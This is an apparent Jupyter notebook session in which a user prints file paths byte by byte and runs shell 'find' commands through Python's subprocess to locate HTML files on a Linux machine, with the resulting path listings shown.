109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
73
9

116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
83
99
97
116
116
101
114
118
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
67
111
109
109
95
99
114
101
97
116
101
95
107
101
121
118
97
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
87
97
105
116
46
104
116
109
108
10
47
104
111
109


104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
83
99
97
110
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
84
121
112
101
95
105
110
100
101
120
101
100
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
65
108
108
116
111
97
108
108
119
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
10

KeyboardInterrupt: 

In [59]:
proc = subprocess.Popen("find /home/sleven/ -name '*.html'", shell=True, stdout=subprocess.PIPE)
output = proc.stdout.read()


find: ‘/home/sleven/playground/aflresults/queue’: Permission denied
find: ‘/home/sleven/playground/aflresults/crashes’: Permission denied
find: ‘/home/sleven/playground/aflresults/hangs’: Permission denied
find: ‘/home/sleven/playground/afl/queue’: Permission denied
find: ‘/home/sleven/playground/afl/crashes’: Permission denied
find: ‘/home/sleven/playground/afl/hangs’: Permission denied


In [60]:
print(output)

b'/home/sleven/.config/VSCodium/User/History/-384f8b44/ZzYe.html\n/home/sleven/.config/VSCodium/User/History/-384f8b44/zkAl.html\n/home/sleven/.config/VSCodium/User/History/-384f8b44/PD1a.html\n/home/sleven/.config/VSCodium/User/History/-384f8b44/PZkU.html\n/home/sleven/.config/VSCodium/User/History/-384f8b44/PiEU.html\n/home/sleven/.config/VSCodium/User/History/-384f8b44/Iv6E.html\n/home/sleven/.config/VSCodium/User/History/-384f8b44/ToZa.html\n/home/sleven/.config/VSCodium/User/History/-384f8b44/Qk4p.html\n/home/sleven/.config/google-chrome/Default/Extensions/aapocclcgogkmnckokdopfmhonfmgoek/0.10_0/main.html\n/home/sleven/.config/google-chrome/Default/Extensions/aohghmighlieiainnegkcijnfilokake/0.10_0/main.html\n/home/sleven/.config/google-chrome/Default/Extensions/felcaaldnbdncclmgdcncolpebgiejap/1.2_0/main.html\n/home/sleven/.config/google-chrome/Default/Extensions/pkedcjkdefgpdelpbcmbmeomcjbeemfm/8921.104.0.3_0/feedback.html\n/home/sleven/.config/google-chrome/Default/Extensions/n

In [ ]:
import subprocess
proc = subprocess.Popen("find / -name '*.html'", shell=True, stdout=subprocess.>
output = proc.stdout.readlines()

for i in output:
        if "/public/index.html" in str(i):
                print(i)
        else:
                continue
